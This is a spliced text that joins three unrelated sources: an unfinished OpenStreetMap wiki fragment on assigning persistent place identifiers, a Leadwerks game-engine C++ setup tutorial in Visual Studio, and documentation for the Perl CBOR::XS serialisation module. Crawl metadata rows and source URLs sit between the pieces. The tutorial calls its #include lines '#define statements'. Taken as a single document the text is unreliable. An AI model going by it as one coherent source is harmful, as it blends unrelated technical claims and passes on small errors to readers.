In the SecureMetaTable we override the GetScaffoldColumns method and filter out of the column list any columns that have a DenyRead action applied for any of the current user's security roles.
SecureMetaColumn, SecureMetaForeignKeyColumn and SecureMetaChildrenColumn
With these types we do have to repeat ourselves a little, as in each we override the IsReadOnly property to check whether the column has a DenyWrite action applied for one of the user's roles.
There is one issue I found, and that is that the default FieldTemplateFactory caches the DynamicControl mode (ReadOnly, Edit and Insert). I did toy with adding the relevant code to the default EntityTemplates (see Listing 7), but decided against it.
protected void DynamicControl_Init(object sender, EventArgs e)
{
    DynamicControl dynamicControl = (DynamicControl)sender;
    dynamicControl.DataField = currentColumn.Name;

    // test for read-only column
    if (currentColumn.IsReadOnly)
        dynamicControl.Mode = DataBoundControlMode.ReadOnly;
}
Listing 7 – adding control mode code to the default EntityTemplates
Instead I decided to use a custom FieldTemplateFactory, see Listing 8.
public class SecureFieldTemplateFactory : FieldTemplateFactory
{
    public override IFieldTemplate CreateFieldTemplate(
        MetaColumn column, DataBoundControlMode mode, string uiHint)
    {
        // code to fix caching issue
        if (column.IsReadOnly)
            mode = DataBoundControlMode.ReadOnly;

        return base.CreateFieldTemplate(column, mode, uiHint);
    }
}
Listing 8 – Secure Field Template Factory
The code here is simple: we just check to see if the column is read-only (remembering that the SecureMetaColumns are already checking this for us) and then set the Mode to DataBoundControlMode.ReadOnly. This nicely keeps our code DRY.
Secure Table and Column Attributes
These are essentially unchanged from the previous series of articles with just a little refactoring to make the code more readable.
Putting It Together
Nearly all the work to get Secure Dynamic Data working is done simply in the Global.asax file.
Figure 1 – Adding Security to Dynamic Data
Also you need the tag mapping from Listing 6; there are some more bits we need to do, but they are standard ASP.Net Security, so let's get that done next.
<authentication mode="Forms">
  <forms loginUrl="~/Login.aspx"
         protection="All"
         defaultUrl="~/Default.aspx"
         path="/" />
</authentication>
<authorization>
  <deny users="?" />
</authorization>
<roleManager enabled="true" />
Listing 9 – Adding standard ASP.Net security to web.config
<location path="Site.css">
  <system.web>
    <authorization>
      <allow users="*" />
    </authorization>
  </system.web>
</location>
Listing 10 – Allowing access to style sheet.
With SQL Server 200x Express edition installed you will get the ASPNETDB created automatically.
Figure 2 – ASP.Net Configuration Utility
Downloads
I think that is about it, so here is the download; it contains three projects: the Class Library and two sample projects, one Entity Framework and one Linq to SQL. Have fun.
40 comments:
Man...You have answers on all my questions... I write dynamic data asp.net application for final exam on college and here I found all the answers I need... You are excellent! My concerns was about roles and Dynamic Data ASP.NET Web Linq to SQL application, customizing field templates,... MSDN helps too, but You are much concrete..Thank You a lot... In my country said that we are young that much are thoughts are young...You're daughters are wrong, You cant be that old, You are still pretty much in shape.. Sorry about bad English... Keep with good work...
Thanks Joe :)
Steve
hi,
I downloaded this sample and change connection string in EF web config and i get this Exception after i logged in "There are no accessible tables. Make sure that at least one data model is registered in Global.asax and scaffolding is enabled or implement custom pages"
Seif
There must be an issue with your connection string sorry about that.
Steve
Thanks Stephen for this great blog,it contains very helpful articles,thanks again for this great work.
I solve the previous issue,but i has another issued,i trying Walkthrough sample for filtering Rows in Tables That Have a Parent-Child Relationship ( ),I get this Exception Unable to cast object of type 'NotAClue.Web.DynamicData.SecureMetaColumn' to type 'System.Web.DynamicData.MetaForeignKeyColumn'
Seif
Hi Seif, not sure what is going ont here as I cannot think of a reason why that cast would occur.
Steve :(
Hi steve, would it be possible to do this with inline editing enabled?
Hi Mr Anonymous :) it should just work as is as long as your InLine Edit page get's it's columns the normal way. I have tested this method with the Telerik RadGrid and that works fine, and I should be blogging about that as soon as time allows.
Steve
Hi Steve, thanks for your quick response for Mr. Anonymous =)
Mind checking to see if i'm doing anything wrong? "User" role are still able to edit/delete (through inline editing). However everything works if i went back into separate-page mode.
routes.Add(new DynamicDataRoute( {table}/ListDetails.aspx") {
Action = PageAction.List,
ViewName = "ListDetails",
RouteHandler = new SecureDynamicDataRouteHandler(),
Model = DefaultModel
});
routes.Add(new DynamicDataRoute("{table}/ListDetails.aspx") {
Action = PageAction.Details,
ViewName = "ListDetails",
RouteHandler = new SecureDynamicDataRouteHandler(),
Model = DefaultModel
});
unless i putting the "routehandler" at the wrong place.
Hi Eddy that looks fine the issue will be with the control you are using. By default all the pages in DD4 use LinkButton or DynamicHyperLink I've made sure that LinkButton is fixed but I had'nt noticed the use of the DynamicHyperLink this will probably be the issue.
Steve
Hi Steve, everything has been on default. I had manually changed LinkButton to SecureLinkButton. Do not see any DynamicHyperLink. Using DD4 & EF. All controls are default. When i put my mouse over Edit/Delete, the hyperlinks appear to be "javascript:__doPostBack('ctl00$ContentPlaceHolder1$GridView1','Delete$0')" & " javascript:__doPostBack('ctl00$ContentPlaceHolder1$GridView1','Edit$0')"
I will try to test it with the standard List DetailsPage as soon as I get the time
Steve
any luck??? =/
Have you tried running the sample on it's own?
Steve
Hi Steve, thank you for your great work.
Have you released a improved version for your database based secure DD?
Not yet, but I do play to for DD4
Steve
I tried this and got the following error message.
Any clues?
The database '5E98F77B1B99BCB7839B5BA9D7C561BC_RE DYNAMIC DATA\SECURINGDYNAMICDATA - 2010-06-13A\SECURINGDYNAMICDATA_L2S\APP_DATA\ASPNETDB.MDF' cannot be opened because it is version 661. This server supports version 612 and earlier. A downgrade path is not supported.
you will need to delete the ASPNET DB and create again as it is for SQL Server 'Express 2008 R2
Steve
Hi Steve,
Do you have an updated version of this? I might be running into the same issue as Eddy above. Everything worked beautifuly when i was using the List.aspx Page template but after switching over to ListDetails.aspx..not so much. I have specified the 2 different TableActions (ReadOnly for one role and Full for another role) on the samet table and everything seems to go pear shaped ... I always get full access..i haven't stepped into the code yet but does this framework currently support "stacking" table actions for different roles? Let me know.
Sorry no I will look at doing somthing about the ListDetaisl page though in the future.
Steve
Hi Steve, Thanks for your great work.
I configured my Application to run with SecureMetaModel and now I would like to see TableActions and ColumnAction enums selected from a DropDownList. How I can do this with Entity Framework?
Enrico
Sorry Enrico, not aure what you are after this version only has static metadata?
Steve
Ok, now I have it working. I had to retrieve authorization settings from a Sql db; I tried to use some ideas from "DynamicData: Database Based Permissions - Part 2". But I need to load also the 'CombinedActions' joined with 'TableActions'.
:-D
Ok, with [FilterUIHint("Enumeration")] and
[EnumDataType(typeof(SelectedTableActions))] before "permission" I have solved those issues with enum data type. Thank you and Dynamic Data 4 team!
Hi Stephen,
Could you provide us a newer version of the populated AspNetDB.mdf with the 2 users (Admin,User)?
Thank you.
Just user ASP.Net Configuration from VS to configure this.
Steve
Thanks Steve you have been a great help for me because I've used DD for my master thesis.
Hi KOsmix, thanks glad I was able to help.
Steve
Hi Steve,
I'm having some issues with using "DenyWrite" on columns. I can set up table permissions just fine and DenyRead on columns works, but if I set DenyWrite, I get errors. The edit screen displays correctly (showing the field as read only), but once I click update, I'm getting errors about how the read only field can't be null, even though it was populated in the edit screen with a value.
I've looked at the OSM in the SavingChanges method, and for some reason, the entity shows up with all null values (except its ID number). As such, it's throwing exceptions because required fields are null. It's not just the fields that have the SecureColumn attribute with DenyWrite in the metadata - if any field has it, all of the fields show up as null in the object state manager.
I'm using the DLL from the NotAClue.DynamicData project in the sample.
Any ideas why this might be happening?
Thanks.
Hi Amy, I've only had this sort of issue once and is was a bug in EF when I used mapped SPROCS for CRUD in the EF model, I reproed it with normal webformas pages. if your not using mapped SPROCs for CRUD I don't know what is happening.
Steve
That's exactly what it was. Removed the SQL stored procedures and it works fine. I suppose I need to go incorporate those into code now, but at least it works.
Thanks for your help!
Yes that is a nast bug and it only shows up when you have a column missing from the edit or read only :(
Steve
That is really fantastic! Thanks Steve for this useful code. Just one more little question: i would like to hide the hyperlinks "edit" and "delete" in case of CombinedActions.ReadOnly. The delete-link ist rendered in SecureLinkButton.cs, therefor i replaced "writer.Write(String.Format("{0}", Text))" by "writer.Write(String.Format("", Text))". But what would be the best approach to render the "edit" hyperlink?
Regards Tillmann
Hi Tillmann, direct e-mail and we can discuss in detail.
Steve
Hi Steve,
Great code again! Do you have implemented your securing solution in AD environment? I am trying to modify your solution, but I have a problem to access session object from SecureDynamicDataRouteHandler. I store users AD roles in session object. Thanks
Hi Miloš, yes it works fine with the AD provider, your only issue is the Roles, if you want to use AD Groups the you would need an AD Roles provider and that has issues. I rolled my own and is does caching of users Roles as AD so slow it really slowed down my web site. If you want the code please send me an e-mail direct my address in on my blog.
Steve
Exactly, my problem is unacceptable slow performance of web application after adding AD security. I have send you an email with my details. Thanks
Thats it Steve, thanks for your final code! My AD rolled application is now working like a charm!
Hi Steve,
I am unable to see your downloads. Any other way I could get them for reference?
Thanks!
Hi Sabrina, you will have to search my One Drive public folder here
to find the download Microsoft did a change a while back to SkyDrive that messedup ALL my downloads, but they are still there on One Drive :)
Steve | http://csharpbits.notaclue.net/2010/06/securing-dynamic-data-4-replay.html | CC-MAIN-2018-51 | refinedweb | 3,070 | 50.53 |
/*
 * _msg.h 1.7 86/07/16 SMI
 * from: @(#)rpc_msg.h 2.1 88/07/29 4.0 RPCSRC
 * $Id: rpc_msg.h,v 1.3 2004/10/28 21:58:24 emoy Exp $
 */

/*
 * rpc_msg.h
 * rpc message definition
 *
 * Copyright (C) 1984, Sun Microsystems, Inc.
 */

#ifndef _RPC_RPCMSG_H
#define _RPC_RPCMSG_H

#ifdef __LP64__
#define RPC_MSG_VERSION		((unsigned int) 2)
#else
#define RPC_MSG_VERSION		((unsigned long) 2)
#endif
#define RPC_SERVICE_PORT	((unsigned short) 2048)

/*
 * Bottom up definition of an rpc message.
 * NOTE: call and reply use the same overall stuct but
 * different parts of unions within it.
 */

enum msg_type {
	CALL=0,
	REPLY=1
};

enum reply_stat {
	MSG_ACCEPTED=0,
	MSG_DENIED=1
};

enum accept_stat {
	SUCCESS=0,
	PROG_UNAVAIL=1,
	PROG_MISMATCH=2,
	PROC_UNAVAIL=3,
	GARBAGE_ARGS=4,
	SYSTEM_ERR=5
};

enum reject_stat {
	RPC_MISMATCH=0,
	AUTH_ERROR=1
};

/*
 * Reply part of an rpc exchange
 */

/*
 * Reply to an rpc request that was accepted by the server.
 * Note: there could be an error even though the request was
 * accepted.
 */
struct accepted_reply {
	struct opaque_auth	ar_verf;
	enum accept_stat	ar_stat;
	union {
		struct {
#ifdef __LP64__
			unsigned int	low;
			unsigned int	high;
#else
			unsigned long	low;
			unsigned long	high;
#endif
		} AR_versions;
		struct {
			caddr_t		where;
			xdrproc_t	proc;
		} AR_results;
		/* and many other null cases */
	} ru;
#define	ar_results	ru.AR_results
#define	ar_vers		ru.AR_versions
};

/*
 * Reply to an rpc request that was rejected by the server.
 */
struct rejected_reply {
	enum reject_stat rj_stat;
	union {
		struct {
#ifdef __LP64__
			unsigned int low;
			unsigned int high;
#else
			unsigned long low;
			unsigned long high;
#endif
		} RJ_versions;
		enum auth_stat RJ_why;	/* why authentication did not work */
	} ru;
#define	rj_vers	ru.RJ_versions
#define	rj_why	ru.RJ_why
};

/*
 * Body of a reply to an rpc request.
 */
struct reply_body {
	enum reply_stat rp_stat;
	union {
		struct accepted_reply RP_ar;
		struct rejected_reply RP_dr;
	} ru;
#define	rp_acpt	ru.RP_ar
#define	rp_rjct	ru.RP_dr
};

/*
 * Body of an rpc request call.
 */
struct call_body {
#ifdef __LP64__
	unsigned int cb_rpcvers;	/* must be equal to two */
	unsigned int cb_prog;
	unsigned int cb_vers;
	unsigned int cb_proc;
#else
	unsigned long cb_rpcvers;	/* must be equal to two */
	unsigned long cb_prog;
	unsigned long cb_vers;
	unsigned long cb_proc;
#endif
	struct opaque_auth cb_cred;
	struct opaque_auth cb_verf;	/* protocol specific - provided by client */
};

/*
 * The rpc message
 */
struct rpc_msg {
#ifdef __LP64__
	unsigned int		rm_xid;
#else
	unsigned long		rm_xid;
#endif
	enum msg_type		rm_direction;
	union {
		struct call_body RM_cmb;
		struct reply_body RM_rmb;
	} ru;
#define	rm_call		ru.RM_cmb
#define	rm_reply	ru.RM_rmb
};
#define	acpted_rply	ru.RM_rmb.ru.RP_ar
#define	rjcted_rply	ru.RM_rmb.ru.RP_dr

__BEGIN_DECLS
/*
 * XDR routine to handle a rpc message.
 * xdr_callmsg(xdrs, cmsg)
 *	XDR *xdrs;
 *	struct rpc_msg *cmsg;
 */
extern bool_t	xdr_callmsg	__P((XDR *, struct rpc_msg *));

/*
 * XDR routine to pre-serialize the static part of a rpc message.
 * xdr_callhdr(xdrs, cmsg)
 *	XDR *xdrs;
 *	struct rpc_msg *cmsg;
 */
extern bool_t	xdr_callhdr	__P((XDR *, struct rpc_msg *));

/*
 * XDR routine to handle a rpc reply.
 * xdr_replymsg(xdrs, rmsg)
 *	XDR *xdrs;
 *	struct rpc_msg *rmsg;
 */
extern bool_t	xdr_replymsg	__P((XDR *, struct rpc_msg *));

/*
 * Fills in the error part of a reply message.
 * _seterr_reply(msg, error)
 *	struct rpc_msg *msg;
 *	struct rpc_err *error;
 */
extern void	_seterr_reply	__P((struct rpc_msg *, struct rpc_err *));
__END_DECLS

#endif /* !_RPC_RPCMSG_H */
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode.
Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript).
Hi there,
I'm wondering, is it possible to avoid IsActive() in Message to support older C4D-Versions.
IsActive()
In another thread: we've talked about the ability to drag BitmapButtons into the layout via SetCommandDragId.
SetCommandDragId)
return True
def Message(self, msg, result):
if msg.GetId() == c4d.BFM_INTERACTEND:
if self.IsActive(10003):
print 'Icon clicked in the GeDialog.'
Is it simply not possible to support older C4D-Versions AND have a draggable BitmapButton...?
Thanks,
Lasse
Hi @lasselauch, I will take a look, but only in few days since R18 is the minimal version working for IsActive and it's more than 3years old, while we provide support only for 2 previous release.
But maybe there is another way to catch this kind of stuff that would work in older version so that's why I said I will take a look.
Cheers,
Maxime.
Thanks @m_adam,
for now I've added a workaround for older versions so it's not possible to drag the buttons to the layout.
Works for me, but would be nice to know anyway.
Hi Maxime,
I still have some problems using IsActive(). I'm having some c4d.plugins.CommandData utilizing the c4d.gui.ShowPopupDialog. Sadly sometimes the Popup will be called even after pressing the button. Happens escpially in the end of the following *.gif. (After clicking on the button, I constantly click on the Menubar, and sometimes the popup will be displayed again...)
c4d.plugins.CommandData
c4d.gui.ShowPopupDialog
My Message(self, msg, result) looks like the following:
Message(self, msg, result)
def Message(self, msg, result):
if c4d.GetC4DVersion() >= 18000:
#Handle CommandDragID
if msg.GetId() == c4d.BFM_INTERACTEND:
if self.IsActive(ids.IDC_BUTTON1):
c4d.CallCommand(ids.PLUGIN_ID_EXPORT)
elif self.IsActive(ids.IDC_BUTTON2):
c4d.CallCommand(ids.PLUGIN_ID_OMCLEANER)
elif self.IsActive(ids.IDC_BUTTON3):
c4d.CallCommand(ids.PLUGIN_ID_PYSCRIPTS)
elif self.IsActive(ids.IDC_BUTTON4):
c4d.CallCommand(ids.PLUGIN_ID_RECENTFILES)
elif self.IsActive(ids.IDC_BUTTON5):
c4d.CallCommand(ids.PLUGIN_ID_CHATLOG)
return c4d.gui.GeDialog.Message(self, msg, result)
Any ideas how to avoid or counter-act this!?
May I ask in what range you enumerated your Dialog controls?
If I recall correctly, there was this kind of behavior if the control IDs were below a certain number.
The ids are starting from 20001.
ids
20001
IDD_DIALOG = 20001
IDC_BUTTONFLUSHGROUP = 20002
IDC_BUTTON1 = 20003
IDC_BUTTON2 = 20004
IDC_BUTTON3 = 20005
IDC_BUTTON4 = 20006
IDC_BUTTON5 = 20007
Then of course the Commands like ids.PLUGIN_ID_EXPORT are generated PluginIDs.
ids.PLUGIN_ID_EXPORT
After looking at your GIF again, it seems like the following happens:
When checking for BFM_INTERACTEND and poking yround inyour dialog, the focus switches back to the last active Gadget. Thus your commands are fired since you are checking if the gadgets do have the focus.
BFM_INTERACTEND
Yeah, I guess that makes sense.
What would be the best way to work around that behaviour?
Shall I return return c4d.gui.GeDialog.Message(self, msg, result) after each c4d.CallCommand()?
return c4d.gui.GeDialog.Message(self, msg, result)
c4d.CallCommand()
A simple else statement didn't work.
Cheers,
Lasse
This does not solve your initial issue since it requires the use of GetItemDim and it was introduced in R18 but here is how to avoid your second issue:
import c4d
class Dialog(c4d.gui.GeDialog):)
self.AddStaticText(10001, 0, 0, name="test")
return True
def Message(self, msg, result):
# Main thread
if msg.GetId() == c4d.BFM_INTERACTSTART:
c4d.StopAllThreads()
# Check the mouse is clicked
state = c4d.BaseContainer()
self.GetInputState(c4d.BFM_INPUT_MOUSE, c4d.BFM_INPUT_MOUSERIGHT, state)
if state.GetInt32(c4d.BFM_INPUT_CHANNEL) != 0:
# Get coordinates
x = state.GetInt32(c4d.BFM_INPUT_X)
y = state.GetInt32(c4d.BFM_INPUT_Y)
g2l = self.Global2Local()
x += g2l['x']
y += g2l['y']
# Checks the coordinate is within the range of the BitmapButton
if self.IsPositionOnGadget(10003, x, y):
print 'Icon clicked in the GeDialog.'
# Stop others event to be processed
self.KillEvents()
return True
return c4d.gui.GeDialog.Message(self, msg, result)
# Main function
def main():
global dlg
dlg = Dialog()
dlg.Open(c4d.DLG_TYPE_ASYNC)
# Execute main()
if __name__=='__main__':
main()
Note that there is a very similar problem Disable default Right-Click Menu that you may found interesting about how to handle popup in your dialog.
And adding this constraint in mind, I'm afraid I don't see any solution to make it work before R18.
Cheers,
Maxime.
Thanks @m_adam for the insights!
Works like a charm!! | https://plugincafe.maxon.net/topic/12413/avoid-isactive | CC-MAIN-2021-49 | refinedweb | 759 | 51.65 |
This Week in Elasticsearch and Apache Lucene - 2019-02-22
Elasticsearch Highlights
Zen2 at scale
We have been investigating Zen2's behaviour with large cluster states and/or large clusters, pushing past the boundaries of what we might consider to be a reasonable deployment and into the territory of the OOM killer. Pleasingly, we found that master election behaves reasonably well even with tens of master-eligible nodes. We fixed one memory-consuming issue ( #39179) and continue to look for other ways to bound the memory needed to publish 100+MB of cluster state to 50+ nodes all at once.
Performance
We have released Rally 1.0.4. We did the release mainly to ensure users can still benchmark in a world of typeless APIs as this will be the default in Elasticsearch 7.0.0.
After switching the default store type from mmapfs to hybridfs we have seen reduced performance in our nightly benchmarks (up to 20% less indexing throughput and significantly increased latency for some queries). The goal of that change was to avoid page cache thrashing for very large indices but for practical purposes (all benchmarks need to finish within a day) our nightly benchmarks use only rather "small" indices of up to 75GB. It turns out that Lucene uses a combined segment file format (.cfs) for smaller segments to save file handles which we accessed via NIO instead of memory-mapping them and that lead to significantly worse performance for the "small" indices we use in our nightly benchmarks. After discussions with the Lucene team and more benchmarking, we have now added cfs files to the list of files to memory-map. This restored original performance for small indices while retaining the performance benefit for large indices.
ILM (and CCR)
ILM is now fully integrated with CCR (#34648). The final commit to ensure the ILM and CCR work correctly together has been merged (#38529).
In order to replicate across clusters efficiently and correctly, CCR needs to keep a history of the operations performed on a leader shard - indexing, deletes, etc. When those operations are replicated to the follower shard, they'll be applied in a way that keeps everything consistent. If CCR doesn't have that history of operations, it has to fall back to file-based recovery, which can be much less efficient. During this time, there would not be any available shard copy on the follower side, making this a situation that we want to avoid.
Shard history retention leases allow the follower to be able to mark in the changes stream where it is, allowing the leader to keep all shard history after the operation specified in the lease to ensure that it doesn't have to be rebuilt from scratch via a file-based recovery.
ILM now pays attention to these leases and waits to perform operations that would necessarily destroy shard history, specifically the Shrink and Delete actions, if there are any leases put in place by followers, ILM will wait until those leases are released by the follower or the leases time out. This makes sure we keep all the shard history around so that it can be replicated to followers - if we didn't do this, we would risk losing the history of shard operations while a follower is still trying to replicate operations from the leader.
Search - Intervals
We exposed some additional Interval filters to the elasticsearch query DSL. These new operators
overlapping,
before and
after add new ways to match intervals within documents.
DFS query
We worked on an improvement to the way DFSPhase builds distributed term statistics. This is part of a longer-term plan to possibly remove Weight.extractTerms() from Lucene.
ES Management UI
We also worked on refactoring our server logic to a common library and avoid loads of code duplication across our apps. This work inspired us to work on refactoring our License checker logic for our application. This is the first step towards improving our UX to guide our users when they don't have the correct license to access a plugin.
ODBC
We implemented the functionality to enable the new DATE data type conversions. With it, an application that queries a column of type DATE will have the data returned as native ODBC DATE data structure, with all components broken down, thus enabling faster operations on it. This PR also updates the currently advertised available standards scalars.
Apache Lucene
Query Visiting
Our team members are known for bringing up decade old issues after we learned a lot more what needs to be done, this time we are looking into Query Visitors to add a generic and flexible way to traverse Query trees. It's puzzling why these issues are originally assigned or opened by the same person.
Last Minute
We got in some last minute API breakage into 8.0 that makes delegation of TermsEnum much less trappy. This caused many issues in the past including enormous memory usage and slow retrieval.
Also coming in last minute we added On-Disk term dictionaries. FSTs are Lucene's wonder weapon when it gets to fast term lookups. This data-structure is loaded entirely into heap memory until 8.0. Now in 8.0 FST are read from disk if the file is memory mapped. It tries to detect if mmap directory is used and reads off-disk if the term statistics imply that the field is not a ID field. The performance numbers are on-par with in-memory for non-ID fields while saving significant amounts of memory.
Geo Land
We pushed another performance optimization on the BKD tree by making the heap objects more efficient. This change has a side effect on other indexing strategies (e.g BKD tree on 1 dimensional points) as the tree will always create one of those heap objects regardless the data that is going to work on. We opened another issue to create such objects only when they are needed. We also refactored the tests for LatLonShape as a step to facilitate the implementation of CONTAINS.
Changes in Elasticsearch
Changes in 8.0:
- Fix the OS sensing code in ClusterFormationTasks 38457
- Remove setting index.optimize_auto_generated_id (#27583) 27600
Changes in 7.1:
- Distance measures for dense and sparse vectors 37947
- Don't swallow IOExceptions in InternalTestCluster. 39068
- BREAKING: Enforce Completion Context Limit 38675
- Add overlapping, before, after filters to intervals query 38999
- Tie break search shard iterator comparisons on cluster alias 38853
Changes in 7.0:
- Remove
nGramand
edgeNGramtoken filter names (#38911) 39070
- Extend nextDoc to delegate to the wrapped doc-value iterator for date_nanos 39176
- Do not create the missing index when invoking getRole 39039
- Don't close caches while there might still be in-flight requests. 38958
- Blob store compression fix 39073
- Fix libs:ssl-config project setup 39074
- Fix #38623 remove xpack namespace REST API 38625
- Also mmap cfs files for hybridfs 38940
- Recover peers from translog, ignoring soft deletes 38904
- Fix NPE on Stale Index in IndicesService 38891
Changes in 6.7:
- ReadOnlyEngine should update translog recovery state information 39238
- Align generated release notes with doc standards 39234
- Rebuild remote connections on profile changes 37678
- minor updates for user-agent ecs for 6.7 39213
- Only create MatrixStatsResults on final reduction 38130
- Link to 7.0 documentation in deprecation checks 39194
- Ensure global test seed is used for all random testing tasks 38991
- Bump jackson-databind version for AWS SDK 39183
- Reduce refresh when lookup term in FollowingEngine 39184
- Deprecate fallback to java on PATH 37990
- Deprecate Hipchat Watcher actions 39160
- Bump jackson-databind version for ingest-geoip 39182
- Remove retention leases when unfollowing 39088
- Resolve concurrency with watcher trigger service 39092
- Allow retention lease operations under blocks 39089
- Fix DateFormatters.parseMillis when no timezone is given 39100
- Fix shard follow task startup error handling 39053
- Specify include_type_name in HTTP monitoring. 38927
- Introduce retention lease state file 39004
- Generate mvn pom for ssl-config library 39019
- Integrate retention leases to recovery from remote 38829
- ShardBulkAction ignore primary response on primary 38901
Changes in 6.6:
- SQL: add "validate.properties" property to JDBC's allowed list of settings 39050
- SQL: enforce JDBC driver - ES server version parity 38972
- Fix simple query string serialization conditional 38960
- Advance max_seq_no before add operation to Lucene 38879
Changes in 6.5:
Changes in Elasticsearch Management UI
Changes in 7.1:
- [Rollup] Add unit tests for Job table 31561
- [CCR] Add
data-test-subjto forms and buttons 30325
- [CCR] i18n feedback 30028
Changes in Elasticsearch SQL ODBC Driver
Changes in 7.1:
Changes in 6.7:
Changes in Rally
Changes in 1.0.4: | https://www.elastic.co/es/blog/this-week-in-elasticsearch-and-apache-lucene-2019-02-22 | CC-MAIN-2019-30 | refinedweb | 1,437 | 58.82 |
Data is everywhere. And in massive quantities.. This model will learn to detect if a hotel review is positive or negative and will be able to understand the sentiment of new and unseen hotel reviews.
The first step is to scrape hotel reviews from TripAdvisor by creating a spider:
New to Scrapy? If you have never used Scrapy before, visit this article. It's very powerful yet easy to use, and will allow you to start building web scrapers in no time.
Choose the data you want to scrape with Scrapy In this tutorial we will use New York City hotel reviews to create our hotel sentiment analysis classifier. In our case we will extract the review title, the review content and the stars:
A TripAdvisor hotel review breakdown
Why the stars? In order to train MonkeyLearn models, we need data that is already tagged, so the algorithm knows how a positive or a negative review actually looks like. Luckily the reviewers were kind enough to provide us with this information, in the form of stars.
To save the data, we will define a Scrapy item with three fields: "title", "content" and "stars":
import scrapy class HotelSentimentItem(scrapy.Item): title = scrapy.Field() content = scrapy.Field() stars = scrapy.Field()
We also create a spider for filling in these items. We give it the start URL of the New York Hotels page.
import scrapy from hotel_sentiment.items import HotelSentimentItem class TripadvisorSpider(scrapy.Spider): name = "tripadvisor" start_urls = [ "" ]
Then, we define a function for parsing a single review and saving its data:
def parse_review(self, response): item = HotelSentimentItem() item['title'] = response.xpath('//div[@class="quote"]/text()').extract()[0][1:-1] #strip the quotes (first and last char) item['content'] = response.xpath('//div[@class="entry"]/p/text()').extract()[0] item['stars'] = response.xpath('//span[@class="rate sprite-rating_s rating_s"]/img/@alt').extract()[0] return item
Afterwards, we define a function for parsing a page of reviews and then passing the page. You'll notice that on the reviews page we can't see the the whole review content, just the beginning. We will work around this by following the link to the full review and scraping the data from that page using parse_review :
def parse_hotel(self, response): for href in response.xpath('//div[@class="quote"]/a/@href'): url = response.urljoin(href.extract()) yield scrapy.Request(url, callback=self.parse_review) next_page = response.xpath('//div[@class="unified pagination "]/child::*[2][self::a]/@href') if next_page: url = response.urljoin(next_page[0].extract()) yield scrapy.Request(url, self.parse_hotel)
Finally, we define the main parse function, which will start at the New York hotels main page, and for each hotel it will parse all its reviews:
def parse(self, response): for href in response.xpath('//div[@class="listing_title"]/a/@href'): url = response.urljoin(href.extract()) yield scrapy.Request(url, callback=self.parse_hotel) next_page = response.xpath('//div[@class="unified pagination standard_pagination"]/child::*[2][self::a]/@href') if next_page: url = response.urljoin(next_page[0].extract()) yield scrapy.Request(url, self.parse)
So, to review: we told our spider to start at the New York hotels main page, follow the links to each hotel, follow the links to each review, and scrape the data. After it is done with each page it will get the next one, so it will be able to crawl as many reviews as we need.
You can view the full code for the spider here.
So we have our Scrapy spider created, we are ready to start crawling and gathering the data.
We tell it to crawl with scrapy crawl tripadvisor -o scrapyData.csv -s CLOSESPIDER_ITEMCOUNT=10000
This will scrape 10,000 TripAdvisor New York City hotel reviews and save them in a CSV file named scrapyData.csv . With that many reviews, it may take a while to finish. Feel free to change the amount if you need.
So we generated our scrapyData.csv file, now it's time to preprocess the data. We'll do that with Python and the Pandas library.
First, we import the CSV file into a data frame, remove duplicates, drop the reviews that are neutral (3 of 5 stars):
import pandas as pd # We use the Pandas library to read the contents of the scraped data # obtained by Scrapy df = pd.read_csv('scrapyData.csv', encoding='utf-8') # Now we remove duplicate rows (reviews) df.drop_duplicates(inplace=True) # Drop the reviews with 3 stars, since we're doing Positive/Negative # sentiment analysis. df = df[df['stars'] != '3 of 5 stars']
Then we create a new column that concatenates the title and the content:
# We want to use both the title and content of the review to # classify, so we merge them both into a new column. df['full_content'] = df['title'] + '. ' + df['content']
Then we create a new column that will be what we want to predict: Good or Bad, so we transform reviews with more than 3 stars into Good, and reviews with less than 3 stars into Bad:
def get_class(stars): score = int(stars[0]) if score > 3: return 'Good' else: return 'Bad' # Transform the number of stars into Good and Bad tags. df['true_category'] = df['stars'].apply(get_class)
We'll keep only the full_content and true_category columns:
df = df[['full_content', 'true_category']]
If we take a look at the data frame we created it may look something like this:
To have a quick overview of the data, we have 4,913 Good reviews and 4,501 Bad reviews:
# Print a histogram of sentiment values df['true_category'].value_counts() Good 4913 Bad 4501 dtype: int64
This looks about right. If you have too few reviews for a particular tag (for instance, 9,000 Good and 1,000 Bad), it could have a negative impact on the training of your model. To fix this, scrape more bad reviews: run the spider again, for a longer time, then get only the bad reviews and mix them with the data you already have. Or you could find hotels with mostly bad reviews and scrape those.
Finally, we have to save our dataset as a CSV or Excel file so we can upload it to MonkeyLearn to train our classifier. To train our model we only need the content of the reviews and the corresponding tags, so we remove the headers and the index column. We also encode the file in UTF-8:
# Write the data into a CSV file df.to_csv('scrapyData_MonkeyLearn.csv', header=False, index=False, encoding='utf-8')
Ok, now it's time to move to MonkeyLearn. We want to create a text classifier that classifies reviews into two possible tags Good or Bad. This process is known as Sentiment Analysis, that is, identifying the mood from a piece of text.
First, you have to sign up for Monkeylearn, and after you log in you will see the main dashboard. MonkeyLearn has public models created by the MonkeyLearn team trained for specific tasks, but it also allows you to create your own custom model to fit your needs. In this case, you'll build a custom text classifier, so click the Create Model button: | https://monkeylearn.com/blog/creating-sentiment-analysis-model-with-scrapy/ | CC-MAIN-2022-27 | refinedweb | 1,180 | 64 |
Howdy all,
I’m having an issue using strok to pull a string of chars apart on an ESP32, using the Arduino IDE.
Here’s the code so far :
#include "string.h" String inboundText = "2,4,6"; void setup() { Serial.begin(115200); char buf[100]; char delimiter = ','; inboundText.toCharArray(buf,sizeof(inboundText)); char* ptr = strok(buf,delimiter); while(ptr!=NULL) { printf("found one part: %s/n",ptr); //create the next part ptr = strok(NULL, delimiter); } }
The code won’t compile, saying “‘strok’ was not declared in this scope”.
I’ve searched high and low, added every reference under the sun, but still can’t get this to work.
Any help would be greatly appreciated.
Cheers | https://forum.arduino.cc/t/strok-not-declared-in-this-scope/851104 | CC-MAIN-2021-43 | refinedweb | 115 | 68.26 |
Recently a few people have sent me mail asking how to handle these types of scenarios using LINQ. The post below describes how you can use a Dynamic Query Library provided by the LINQ team to dynamically construct LINQ queries.
Included on the VS 2008 Samples download page are pointers to VB and C# sample packages that include a cool dynamic query LINQ helper library. Direct pointers to the dynamic query library (and documentation about it) can be found below:
